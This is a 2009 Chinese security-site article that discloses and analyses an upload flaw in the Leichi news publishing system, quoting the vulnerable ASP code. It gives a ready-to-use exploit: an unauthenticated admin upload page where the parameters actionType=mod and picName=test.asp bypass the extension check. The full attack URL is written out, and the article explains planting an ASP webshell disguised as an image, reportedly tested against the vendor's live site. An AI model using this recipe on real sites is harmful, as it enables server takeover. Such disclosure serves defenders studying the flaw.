黑基网 首页 学院 网络安全 查看内容

雷驰新闻发布管理系统漏洞分析

2009-2-4 17:46| 投稿: security

摘要: 声明:漏洞为focn[BCT]首先发现,版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任! 作者:黑萝卜系统: 雷驰新闻发...
声明:漏洞为focn[BCT]首先发现,版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任! 作者:黑萝卜系统: 雷驰新闻发布管理系统版本: 当前任何版本漏洞描述:1 在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可                以 访问到此文件。任意用户都可以使用此文件上传文件到服务器              2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码!           if file.FileSize>0 then       ''如果 FileSize > 0 说明有文件数据             '生成图片名字            if actionType= "mod" then              remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))            else              if editRemNum<>"" then                                 remNum = editRemNum              else                Randomize                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)              end if              remFileName = remNum&"_"&(editImageNum+1)&".gif"            end if                        file.SaveAs Server.mappath(formPath&remFileName)   ''保存文件               %> 关键的是 if actionType= "mod" then              remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件构造如下UPLhttp://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp然后在上传文件里面填要传的图片格式的ASP木马就可以在uppic目录下上传文件名为test.asp的文件 本方法在雷驰官方网站上测试通过!·再次希望大家不要用于非法用途!!
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文搜集整理自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,请我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部